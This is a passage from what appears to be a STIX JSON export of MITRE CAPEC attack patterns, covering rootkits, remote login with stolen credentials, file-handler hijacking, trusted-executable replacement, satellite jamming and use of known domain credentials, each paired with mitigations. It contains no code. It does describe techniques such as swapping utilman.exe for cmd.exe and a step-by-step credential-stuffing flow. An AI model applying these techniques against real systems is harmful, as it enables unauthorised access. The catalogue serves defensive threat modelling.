Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.", + "external_references": [ + { + "external_id": "CAPEC-552", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/552.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Rootkit", + "external_id": "T1014", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1014" + }, + { + "description": "Pre-OS Boot:Bootkit", + "external_id": "T1542.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/003" + }, + { + "description": "Boot or Logon Autostart Execution:Kernel Modules and Extensions", + "external_id": "T1547.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/006" + } + ], + "id": "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Install Rootkit ", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A rootkit may take the form of a hypervisor. A hypervisor is a software layer that sits between the operating system and the processor. It presents a virtual running environment to the operating system. An example of a common hypervisor is Xen. Because a hypervisor operates at a level below the operating system it can hide its existence from the operating system.", + "Similar to a rootkit, a bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). 
Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent adversary access to privileged accounts necessary to install rootkits.", + "id": "course-of-action--7b0746b7-4370-4dbd-9a32-96187b4ac73f", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-552-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4d2cd3db-aad4-4f8f-b45c-6841ffaeef34", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b0746b7-4370-4dbd-9a32-96187b4ac73f", + "spec_version": "2.1", + "target_ref": "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-12-07T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attacks a system by bypassing some or all functionality intended to protect it. 
Often, a system user will think that protection is in place, but the functionality behind those protections has been disabled by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-554", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/554.html" + }, + { + "external_id": "CWE-424", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/424.html" + }, + { + "external_id": "CWE-1299", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1299.html" + } + ], + "id": "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Functionality Bypass", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce", + "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. 
Once access is gained, any number of malicious activities could be performed.", + "external_references": [ + { + "external_id": "CAPEC-555", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/555.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Remote Services", + "external_id": "T1021", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1021" + }, + { + "description": "Email Collection:Remote Email Collection", + "external_id": "T1114.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1114/002" + }, + { + "description": "External Remote Services", + "external_id": "T1133", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + } + ], + "id": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Remote Services with Stolen Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + 
"attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.", + "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable RDP, telnet, SSH and enable firewall rules to block such traffic. Limit users and accounts that have remote interactive login access. Remove the Local Administrators group from the list of groups allowed to login through RDP. Limit remote user permissions. 
Use remote desktop gateways and multifactor authentication for remote logins.", + "id": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-555-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "spec_version": "2.1", + "target_ref": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. 
Applications can modify the file handler for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "external_references": [ + { + "external_id": "CAPEC-556", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/556.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Event Triggered Execution:Change Default File Association", + "external_id": "T1546.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1546/001" + } + ], + "id": "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Replace File Extension Handlers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect registry for changes. 
Limit privileges of user accounts so changes to default file handlers can only be performed by authorized administrators.", + "id": "course-of-action--4709dd63-ad1f-4755-b03a-b1441d4a3f50", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-556-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--96425e94-0d20-4e81-a5f2-950f705d5102", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4709dd63-ad1f-4755-b03a-b1441d4a3f50", + "spec_version": "2.1", + "target_ref": "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-557", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/557.html" + } + ], + "id": "attack-pattern--ccf63cb4-ae14-4c51-a379-9dd09be8f078", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Schedule Software To Run", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary 
exploits weaknesses in privilege management or access control to replace a trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.", + "external_references": [ + { + "external_id": "CAPEC-558", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/558.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Event Triggered Execution: Accessibility Features", + "external_id": "T1546.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1546/008" + } + ], + "id": "attack-pattern--d9069913-2a5f-4ad5-878e-73181f0b1067", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Trusted Executable", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Specific versions of Windows contain accessibility features that may be launched with a key combination before a user has logged in (for example when they are on the Windows Logon screen). On Windows XP and Windows Server 2003/R2, the program (e.g. \"C:\\Windows\\System32\\utilman.exe\") may be replaced with cmd.exe (or another program that provides backdoor access). Then pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over RDP will cause the replaced file to be executed with SYSTEM privileges." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary sends disruptive signals at a target satellite using a rogue uplink station to disrupt the intended transmission. Those within the satellite's footprint are prevented from reaching the satellite's targeted or neighboring channels. The satellite's footprint size depends upon its position in the sky; higher orbital satellites cover multiple continents.", + "external_references": [ + { + "external_id": "CAPEC-559", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/559.html" + }, + { + "description": "Small Media, Satellite Jamming in Iran: A War over Airwaves, 2012--11", + "external_id": "REF-462", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7a6e0e5c-f18e-4612-aaa6-68bdeb378b31", + "modified": "2017-01-12T00:00:00.000Z", + "name": "Orbital Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny the availability of the satellite communications for authorized users.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This attack requires the knowledge of the satellite's coordinates for targeting." + ], + "x_capec_resources_required": [ + "A satellite uplink station." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-207 : Removing Important Client Functionality. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-56", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/56.html" + } + ], + "id": "attack-pattern--86daf34c-5e2b-49d7-b579-cfde98c462ac", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Removing/short-circuiting 'guard logic'", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. 
userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-560", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/560.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-1273", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1273.html" + }, + { + "description": "Valid Accounts", + "external_id": "T1078", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1078" + }, + { + "description": "Attractive Accounts for Credential Theft, 2017--05---31, Microsoft Corporation", + "external_id": "REF-570", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/attractive-accounts-for-credential-theft?redirectedfrom=MSDN" + }, + { + "description": "Feike Hacquebord, Two Years of Pawn Storm: Examining an Increasingly Relevant Threat, 2017--04---25, Trend Micro", + "external_id": "REF-571", + "source_name": "reference_from_CAPEC", + "url": 
"https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf" + }, + { + "description": "Corporate IoT – a path to intrusion, 2019--10---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-572", + "source_name": "reference_from_CAPEC", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion" + }, + { + "description": "Brendan McKeague, Van Ta, Ben Fedore, Geoff Ackerman, Alex Pennino, Andrew Thompson, Douglas Bienstock, Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware, 2019--04---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-573", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + } + ], + "id": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Domain Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--c2a87533-3c81-40b3-b529-9560c644f70d", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + 
"Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "Throughout 2015 and 2016, APT28 — also known as Pawn Storm, Sednit, Fancy Bear, Sofacy, and STRONTIUM — leveraged stolen credentials to infiltrate the Democratic National Committee (DNC), the United States Army, the World Anti-Doping Agency (WADA), the Court of Arbitration for Sport (TAS-CAS), and more. In most cases, the legitimate credentials were obtained via calculated spearphishing, tabnabbing, and DNS attacks targeted at corporate webmail systems. APT28 also executed several watering hole attacks, in addition to exploiting several zero-day vulnerabilities within Flash and Windows. The stolen credentials were then utilized to maintain authenticated access, laterally move within the local network, and exfiltrate sensitive information including DNC emails and personal medical records of numerous athletes. [REF-571]", + "In early 2019, FIN6 exploited stolen credentials from an organization within the engineering industry to laterally move within an environment via the Windows’ Remote Desktop Protocol (RDP). Multiple servers were subsequently infected with malware to create malware distribution servers, which were used to distribute the LockerGoga ransomware. [REF-573]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

  2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.
  3. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

  4. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each credential until the target grants access.

  2. Techniques
    Manually or automatically enter each credential through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted credentials typically result in the adversary laterally moving within the local network, since users are often allowed to login to systems/applications within the network using the same password. This further allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on known passwords generally rely on the primary fact that users often reuse the same username/password combination for a variety of systems, applications, and services, coupled with poor password policies on the target system or application. Adversaries can also utilize known passwords to target Single Sign On (SSO) or cloud-based applications and services, which often don't verify the authenticity of the user's input. Known credentials are usually obtained by an adversary via a system/application breach and/or by purchasing dumps of credentials on the dark web. These credentials may be further gleaned via exposed configuration and properties files that contain system passwords, database connection strings, and other sensitive data.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." 
+ ], + "x_capec_resources_required": [ + "A list of known credentials.", + "A custom script that leverages the credential list to launch an attack." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known credential, leveraging it is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.", + "id": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3e578d6-8b57-4c74-a939-800e0cf7a45b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6395a05b-7097-429d-878c-c8c1f5d4beb4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure users are not reusing username/password combinations for multiple systems, applications, or services.", + "id": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00382075-fd38-4145-ac07-88fa46ab5e82", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse local administrator account credentials across systems.", + "id": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e80f453-8c74-45c3-ad17-5cceded60e65", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deny remote use of local admin credentials to log into domain systems.", + "id": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5d4dbec9-a56a-4a81-9a64-a9d70c3cdcac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "spec_version": "2.1", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow accounts to be a local administrator on more than one system.", + "id": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
